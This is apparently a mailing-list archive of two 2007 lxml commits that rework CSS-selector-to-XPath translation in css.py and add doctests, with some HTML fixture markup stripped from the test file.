max([int(d[9]) for d in data if len(d)>9 and d[9]]) + except ValueError: + pass # may be some newly added directory elif data.startswith(' Author: ianb Date: Fri Jun 29 23:50:47 2007 New Revision: 44635 Added: lxml/branch/html/src/lxml/html/tests/test_css_select.txt (contents, props changed) Modified: lxml/branch/html/src/lxml/html/css.py lxml/branch/html/src/lxml/html/tests/test_css.py lxml/branch/html/src/lxml/html/tests/test_css.txt Log: improvement to CSS selectors, and more tests Modified: lxml/branch/html/src/lxml/html/css.py ============================================================================== --- lxml/branch/html/src/lxml/html/css.py (original) +++ lxml/branch/html/src/lxml/html/css.py Fri Jun 29 23:50:47 2007 @@ -88,60 +88,52 @@ method = getattr(self, method) return method(sel_path, self.expr) - def _xpath_nth_child(self, xpath, expr, last=False): - if isinstance(expr, int): - return self._xpath_nth_child_simple(xpath, expr, last) - if not isinstance(expr, int): - a, b = parse_series(expr) - if not a: - # a=0 means nothing is returned... - xpath.add_condition('false()') - return xpath - if a == 1: - return self._xpath_nth_child_simple(xpath, expr, last) - if b > 0: - b_neg = str(-b) - else: - b_neg = '+%s' % (-b) - expr = '(position() %s) mod %s = 0' % (b_neg, a) - if b >= 0: - expr += ' and position() >= %s' % b - xpath.add_condition(expr) + def _xpath_nth_child(self, xpath, expr, last=False, + add_name_test=True): + a, b = parse_series(expr) + if not a: + # a=0 means nothing is returned... + xpath.add_condition('false() and position() = 0') return xpath - # FIXME: handle an+b, odd, even - # an+b means every-a, plus b, e.g., 2n+1 means odd - # 0n+b means b - # n+0 means a=1, i.e., all elements - # an means every a elements, i.e., 2n means even - # -n means -1n - # -1n+6 means elements 6 and previous - - def _xpath_nth_child_simple(self, xpath, expr, last=False): - if isinstance(expr, int): - expr -= 1 + if add_name_test: + xpath.add_name_test() + xpath.add_star_prefix() + if a == 1: if last: - expr = 'last() - %s' % expr - xpath = XPath('*/%s' % xpath) - xpath.add_index(expr) + b = 'last() - %s' % b + xpath.add_condition('position() = %s' % b) return xpath + if last: + # FIXME: I'm not sure if this is right + a = -a + b = -b + if b > 0: + b_neg = str(-b) + else: + b_neg = '+%s' % (-b) + expr = '(position() %s) mod %s = 0' % (b_neg, a) + if b >= 0: + expr += ' and position() >= %s' % b + elif b < 0 and last: + expr += ' and position() < (last() %s)' % b + xpath.add_condition(expr) + return xpath + # FIXME: handle an+b, odd, even + # an+b means every-a, plus b, e.g., 2n+1 means odd + # 0n+b means b + # n+0 means a=1, i.e., all elements + # an means every a elements, i.e., 2n means even + # -n means -1n + # -1n+6 means elements 6 and previous def _xpath_nth_last_child(self, xpath, expr): return self._xpath_nth_child(xpath, expr, last=True) - def _xpath_nth_of_type(self, xpath, expr, last=False): - # Like nth-of-type, but only for *this* type - if isinstance(expr, int): - expr -= 1 - if last: - expr = 'last() - %s' % expr - xpath = XPath('*/%s' % xpath) - xpath.add_index(expr) - return xpath - else: - raise NotImplementedError + def _xpath_nth_of_type(self, xpath, expr): + return self._xpath_nth_child(xpath, expr, add_name_test=False) def _xpath_nth_last_of_type(self, xpath, expr): - return self._xpath_nth_of_type(xpath, expr, last=True) + return self._xpath_nth_child(xpath, expr, last=True, add_name_test=False) def _xpath_contains(self, xpath, expr): # text content, minus tags, must contain expr @@ -149,6 +141,7 @@ expr = expr._format_element() xpath.add_condition('contains(css:lower-case(string(.)), %s)' % xpath_repr(expr.lower())) + # FIXME: Currently case insensitive matching doesn't seem to be happening return xpath def _xpath_not(self, xpath, expr): @@ -199,7 +192,8 @@ return el_xpath def _xpath_checked(self, xpath): - xpath.add_condition("(@selected or @checked) and (node-name(.) = 'input' or node-name(.) = 'option')") + # FIXME: is this really all the elements? + xpath.add_condition("(@selected or @checked) and (name(.) = 'input' or name(.) = 'option')") return xpath def _xpath_root(self, xpath): @@ -207,35 +201,38 @@ raise NotImplementedError def _xpath_first_child(self, xpath): - xpath = XPath('*/%s' % xpath) - xpath.add_condition('position() = 0') + xpath.add_star_prefix() + xpath.add_name_test() + xpath.add_condition('position() = 1') return xpath def _xpath_last_child(self, xpath): - xpath = XPath('*/%s' % xpath) + xpath.add_star_prefix() + xpath.add_name_test() xpath.add_condition('position() = last()') return xpath def _xpath_first_of_type(self, xpath): - xpath = XPath('*/%s' % xpath) - xpath.add_index(0) + xpath.add_star_prefix() + xpath.add_condition('position() = 1') return xpath def _xpath_last_of_type(self, xpath): - xpath.add_index('last()') + xpath.add_star_prefix() + xpath.add_condition('position() = last()') return xpath def _xpath_only_child(self, xpath): - xpath.add_condition('count(..) = 1') + xpath.add_name_test() + xpath.add_condition('last() = 1') return xpath def _xpath_only_of_type(self, xpath): - # FIXME: I doubt this is right - xpath.add_condition('count(../node-name(.)) = 1') + xpath.add_condition('last() = 1') return xpath def _xpath_empty(self, xpath): - xpath.add_condition("count(.) = 0 and string(.) = ''") + xpath.add_condition("count(./children::*) = 0 and string(.) = ''") return xpath class Attrib(object): @@ -311,6 +308,7 @@ path.add_condition('substring(%s, string-length(%s)-%s) = %s' % (attrib, attrib, len(value)-1, xpath_repr(value))) elif self.operator == '*=': + # FIXME: case sensitive? path.add_condition('contains(%s, %s)' % ( attrib, xpath_repr(value))) else: @@ -339,9 +337,11 @@ def xpath(self): if self.namespace == '*': - return XPath(self.element.lower()) + el = self.element.lower() else: - return XPath('%s:%s' % (self.namespace, self.element)) + # FIXME: Should we lowercase here? + el = '%s:%s' % (self.namespace, self.element) + return XPath(element=el) class Hash(object): """ @@ -359,7 +359,7 @@ def xpath(self): path = self.selector.xpath() - path.add_condition('@id=%s' % xpath_repr(self.id)) + path.add_condition('@id = %s' % xpath_repr(self.id)) return path class Or(object): @@ -412,23 +412,25 @@ def _xpath_descendant(self, xpath, sub): # when sub is a descendant in any way of xpath - return XPath('%s/descendant::%s' % (xpath, sub.xpath())) - + xpath.join('/descendant::', sub.xpath()) + return xpath + def _xpath_child(self, xpath, sub): # when sub is an immediate child of xpath - return XPath(str(xpath) + '/' + str(sub.xpath())) + xpath.join('/', sub.xpath()) + return xpath def _xpath_direct_adjacent(self, xpath, sub): # when sub immediately follows xpath - path = self._xpath_indirect_adjacent(xpath, sub) - path.add_index(0) - return path + xpath.join('/following-sibling::', sub.xpath()) + xpath.add_name_test() + xpath.add_condition('position() = 1') + return xpath def _xpath_indirect_adjacent(self, xpath, sub): # when sub comes somewhere after xpath as a sibling - return XPath('%s/following-sibling::%s' % ( - xpath, sub.xpath())) - + xpath.join('/following-sibling::', sub.xpath()) + return xpath ############################## ## XPath objects: @@ -439,11 +441,8 @@ expr = css_expr.xpath() assert expr is not None, ( "Got None for xpath expression from %s" % repr(css_expr)) - if isinstance(expr, XPathOr): - for item in expr.items: - item.element_path = prefix + item.element_path - else: - expr.element_path = prefix + expr.element_path + if prefix: + expr.add_prefix(prefix) return str(expr) def run_xpath(doc, xpath): @@ -455,12 +454,19 @@ class XPath(object): - def __init__(self, element_path, condition=None): - self.element_path = element_path + def __init__(self, prefix=None, path=None, element='*', condition=None): + self.prefix = prefix + self.path = path + self.element = element self.condition = condition def __str__(self): - path = str(self.element_path) + path = '' + if self.prefix is not None: + path += str(self.prefix) + if self.path is not None: + path += str(self.path) + path += str(self.element) if self.condition: path += '[%s]' % self.condition return path @@ -475,8 +481,40 @@ else: self.condition = condition - def add_index(self, index): - self.element_path = '%s[%s]' % (self.element_path, index) + def add_path(self, part): + if self.path is None: + self.path = self.element + else: + self.path += self.element + self.element = part + + def add_prefix(self, prefix): + if self.prefix: + self.prefix = prefix + self.prefix + else: + self.prefix = prefix + + def add_name_test(self): + if self.element == '*': + # We weren't doing a test anyway + return + self.add_condition("name() = %s" % xpath_repr(self.element)) + self.element = '*' + + def add_star_prefix(self): + if self.path: + self.path += '*/' + else: + self.path = '*/' + + def join(self, combiner, other): + prefix = str(self) + prefix += combiner + path = (other.prefix or '') + (other.path or '') + self.prefix = prefix + self.path = path + self.element = other.element + self.condition = other.condition class XPathOr(XPath): @@ -485,14 +523,15 @@ the union, it's the sum, so duplicate elements will appear. """ - def __init__(self, items): + def __init__(self, items, prefix=None): for item in items: assert item is not None self.items = items + self.prefix = prefix def __str__(self): - return ' | '.join(map(str, self.items)) - + prefix = self.prefix or '' + return ' | '.join([prefix + str(i) for i in self.items]) def xpath_repr(s): # FIXME: I don't think this is right @@ -650,6 +689,9 @@ """ if isinstance(s, Element): s = s._format_element() + if not s or s == '*': + # Happens when there's nothing, which CSS things of as * + return (1, 0) if isinstance(s, int): # Happens when you just get a number return (1, s) @@ -657,6 +699,8 @@ return (2, 1) elif s == 'even': return (2, 0) + elif s == 'n': + return (1, 0) if 'n' not in s: # Just a b return int(s) Modified: lxml/branch/html/src/lxml/html/tests/test_css.py ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_css.py (original) +++ lxml/branch/html/src/lxml/html/tests/test_css.py Fri Jun 29 23:50:47 2007 @@ -107,6 +107,7 @@ def test_suite(): suite = unittest.TestSuite() - suite.addTests([doctest.DocFileSuite('test_css.txt')]) + for fn in 'test_css.txt', 'test_css_select.txt': + suite.addTests([doctest.DocFileSuite(fn)]) suite.addTests(list(CSSTestCase.all())) return suite Modified: lxml/branch/html/src/lxml/html/tests/test_css.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_css.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_css.txt Fri Jun 29 23:50:47 2007 @@ -69,33 +69,35 @@ e[@hreflang = 'en' or starts-with(@hreflang, 'en-')] >>> #xpath('E:root') >>> xpath('E:nth-child(1)') - */e[0] + */*[name() = 'e' and (position() = 1)] >>> xpath('E:nth-last-child(1)') - */e[last() - 0] + */*[name() = 'e' and (position() = last() - 1)] + >>> xpath('E:nth-last-child(2n+2)') + */*[name() = 'e' and ((position() +2) mod -2 = 0 and position() < (last() -2))] >>> xpath('E:nth-of-type(1)') - */e[0] + */e[position() = 1] >>> xpath('E:nth-last-of-type(1)') - */e[last() - 0] + */e[position() = last() - 1] >>> xpath('E:first-child') - */e[position() = 0] + */*[name() = 'e' and (position() = 1)] >>> xpath('E:last-child') - */e[position() = last()] + */*[name() = 'e' and (position() = last())] >>> xpath('E:first-of-type') - */e[0] + */e[position() = 1] >>> xpath('E:last-of-type') - e[last()] + */e[position() = last()] >>> xpath('E:only-child') - e[count(..) = 1] + *[name() = 'e' and (last() = 1)] >>> xpath('E:only-of-type') - e[count(../node-name(.)) = 1] + e[last() = 1] >>> xpath('E:empty') - e[count(.) = 0 and string(.) = ''] + e[count(./children::*) = 0 and string(.) = ''] >>> xpath('E:contains("foo")') e[contains(css:lower-case(string(.)), 'foo')] >>> xpath('E.warning') e[contains(concat(' ', normalize-space(@class), ' '), ' warning ')] >>> xpath('E#myid') - e[@id='myid'] + e[@id = 'myid'] >>> xpath('E:not(:contains("foo"))') e[not(contains(css:lower-case(string(.)), 'foo'))] >>> xpath('E F') @@ -103,8 +105,11 @@ >>> xpath('E > F') e/f >>> xpath('E + F') - e/following-sibling::f[0] + e/following-sibling::*[name() = 'f' and (position() = 1)] >>> xpath('E ~ F') e/following-sibling::f >>> xpath('div#container p') - div[@id='container']/descendant::p + div[@id = 'container']/descendant::p + >>> # FIXME: This isn't right, but I don't know what *is* right + >>> xpath('p *:only-of-type') + p/descendant::*[last() = 1] Added: lxml/branch/html/src/lxml/html/tests/test_css_select.txt ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_css_select.txt Fri Jun 29 23:50:47 2007 @@ -0,0 +1,149 @@ +This is a test of CSS selectors. We setup a document we'll use for +all our selections, and a function make querying simpler: + + >>> from lxml.html.css import run_css + >>> from lxml.html import HTML + >>> doc = HTML(''' + ... + ...
+ ... + ... + ... link + ...
    + ...
  1. content
  2. + ...
  3. + ...
    + ...
    + ...
  4. + ...
  5. + ...
  6. + ...
  7. + ...
  8. + ...
  9. + ...
+ ...

+ ... hi there + ... guy

+ ...
    + ...
+ ...
+ ...
+ ... ''') + >>> order = {} + >>> for count, el in enumerate(doc.getiterator()): + ... order[el] = count + >>> def select_ids(selector): + ... items = run_css(doc, selector) + ... if not items: + ... return 'empty' + ... items = run_css(doc, selector) + ... items.sort(key=lambda el: order[el]) + ... return ', '.join([el.get('id', 'nil') for el in items]) + >>> def pcss(main, *selectors): + ... result = select_ids(main) + ... for selector in selectors: + ... sel_result = select_ids(selector) + ... if sel_result != result: + ... print 'Selector %r returns %s' % (selector, sel_result) + ... print result + +Now, the tests: + + >>> pcss('*') # doctest: +ELLIPSIS + nil, nil, nil, outer-div, ... foobar-span + >>> pcss('div') + outer-div, li-div, foobar-div + >>> pcss('a[name]') + name-anchor + >>> pcss('a[rel]') + tag-anchor, nofollow-anchor + >>> pcss('a[rel="tag"]') + tag-anchor + >>> pcss('a[href*="localhost"]') + tag-anchor + >>> pcss('a[href^="http"]') + tag-anchor, nofollow-anchor + >>> pcss('a[href^="http:"]') + tag-anchor + >>> pcss('a[href$="org"]') + nofollow-anchor + >>> pcss('div[foobar~="bc"]', 'div[foobar~="cde"]') + foobar-div + >>> pcss('div[foobar~="cd"]') + empty + >>> pcss('*[lang|="en"]', '*[lang|="en-US"]') + second-li + >>> pcss('*[lang|="e"]') + empty + >>> pcss('li:nth-child(3)') + third-li + >>> pcss('li:nth-child(10)') + empty + >>> pcss('li:nth-child(2n)', 'li:nth-child(even)', 'li:nth-child(2n+0)') + second-li, fourth-li, sixth-li + >>> pcss('li:nth-child(+2n+1)', 'li:nth-child(odd)') + first-li, third-li, fifth-li, seventh-li + >>> pcss('li:nth-child(2n+4)') + fourth-li, sixth-li + >>> # FIXME: I'm not 100% sure this is right: + >>> pcss('li:nth-child(3n+1)') + first-li, fourth-li, seventh-li + >>> # FIXME: I'm not sure if nth-last-child(1) or nth-last-child(1) + >>> # should be equivalent to nth-last-child() + >>> pcss('li:nth-last-child()', 'li:nth-last-child(0)') + seventh-li + >>> pcss('li:nth-last-child(2n)', 'li:nth-last-child(even)') + second-li, fourth-li, sixth-li + >>> pcss('li:nth-last-child(2n+2)') + second-li, fourth-li + >>> pcss('ol:first-of-type') + first-ol + >>> pcss('ol:nth-child(1)') + empty + >>> pcss('ol:nth-of-type(2)') + second-ol + >>> # FIXME: like above, (1) or (2)? + >>> pcss('ol:nth-last-of-type(1)') + first-ol + >>> pcss('span:only-child') + foobar-span + >>> pcss('li div:only-child') + li-div + >>> pcss('div *:only-child') + foobar-span + >>> pcss('p *:only-of-type') + p-em + >>> pcss('p:only-of-type') + paragraph + >>> pcss('a:empty') + name-anchor + >>> pcss('li:empty') + third-li, fourth-li, fifth-li, sixth-li + >>> pcss('*:contains("link")') + nil, nil, outer-div, tag-anchor, nofollow-anchor + >>> pcss('*:contains("E")') + nil, nil, outer-div, first-ol, first-li, paragraph, p-em + >>> pcss('.a', '.b', '*.a', 'ol.a') + first-ol + >>> pcss('.c', '*.c') + first-ol, third-li, fourth-li + >>> pcss('ol *.c', 'ol li.c', 'ol ~ li.c', 'ol > li.c') + third-li, fourth-li + >>> pcss('#first-li', 'li#first-li', '*#first-li') + first-li + >>> # Need some tests of :not() + >>> pcss('li div', 'li > div', 'div div') + li-div + >>> pcss('div > div') + empty + >>> pcss('div + div') + foobar-div + >>> pcss('a ~ a') + tag-anchor, nofollow-anchor + >>> pcss('a[rel="tag"] ~ a') + nofollow-anchor + >>> pcss('ol#first-ol li:last-child', 'ol#first-ol *:last-child') + seventh-li + \ No newline at end of file From ianb at codespeak.net Sat Jun 30 01:36:03 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Sat, 30 Jun 2007 01:36:03 +0200 (CEST) Subject: [Lxml-checkins] r44639 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070629233603.09EE1811C@code0.codespeak.net> Author: ianb Date: Sat Jun 30 01:36:03 2007 New Revision: 44639 Modified: lxml/branch/html/src/lxml/html/css.py lxml/branch/html/src/lxml/html/tests/test_css.txt lxml/branch/html/src/lxml/html/tests/test_css_select.txt Log: More improvements to the selectors Modified: lxml/branch/html/src/lxml/html/css.py ============================================================================== --- lxml/branch/html/src/lxml/html/css.py (original) +++ lxml/branch/html/src/lxml/html/css.py Sat Jun 30 01:36:03 2007 @@ -232,7 +232,7 @@ return xpath def _xpath_empty(self, xpath): - xpath.add_condition("count(./children::*) = 0 and string(.) = ''") + xpath.add_condition("count(./child::*) = 0 and normalize-space(.) = ''") return xpath class Attrib(object): @@ -454,11 +454,13 @@ class XPath(object): - def __init__(self, prefix=None, path=None, element='*', condition=None): + def __init__(self, prefix=None, path=None, element='*', condition=None, + star_prefix=False): self.prefix = prefix self.path = path self.element = element self.condition = condition + self.star_prefix = star_prefix def __str__(self): path = '' @@ -502,15 +504,24 @@ self.element = '*' def add_star_prefix(self): + """ + Adds a /* prefix if there is no prefix. This is when you need + to keep context's constrained to a single parent. + """ if self.path: self.path += '*/' else: self.path = '*/' + self.star_prefix = True def join(self, combiner, other): prefix = str(self) prefix += combiner path = (other.prefix or '') + (other.path or '') + # We don't need a star prefix if we are joining to this other + # prefix; so we'll get rid of it + if other.star_prefix and path == '*/': + path = '' self.prefix = prefix self.path = path self.element = other.element Modified: lxml/branch/html/src/lxml/html/tests/test_css.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_css.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_css.txt Sat Jun 30 01:36:03 2007 @@ -91,7 +91,7 @@ >>> xpath('E:only-of-type') e[last() = 1] >>> xpath('E:empty') - e[count(./children::*) = 0 and string(.) = ''] + e[count(./child::*) = 0 and normalize-space(.) = ''] >>> xpath('E:contains("foo")') e[contains(css:lower-case(string(.)), 'foo')] >>> xpath('E.warning') Modified: lxml/branch/html/src/lxml/html/tests/test_css_select.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_css_select.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_css_select.txt Sat Jun 30 01:36:03 2007 @@ -1,7 +1,7 @@ This is a test of CSS selectors. We setup a document we'll use for all our selections, and a function make querying simpler: - >>> from lxml.html.css import run_css + >>> from lxml.html.css import run_css, xpath >>> from lxml.html import HTML >>> doc = HTML(''' ... @@ -20,7 +20,7 @@ ... c"> ...
  • ...
  • - ...
  • + ...
  • ... ...

    ... hi there @@ -120,7 +120,7 @@ >>> pcss('a:empty') name-anchor >>> pcss('li:empty') - third-li, fourth-li, fifth-li, sixth-li + third-li, fourth-li, fifth-li, sixth-li, seventh-li >>> pcss('*:contains("link")') nil, nil, outer-div, tag-anchor, nofollow-anchor >>> pcss('*:contains("E")') @@ -129,7 +129,7 @@ first-ol >>> pcss('.c', '*.c') first-ol, third-li, fourth-li - >>> pcss('ol *.c', 'ol li.c', 'ol ~ li.c', 'ol > li.c') + >>> pcss('ol *.c', 'ol li.c', 'li ~ li.c', 'ol > li.c') third-li, fourth-li >>> pcss('#first-li', 'li#first-li', '*#first-li') first-li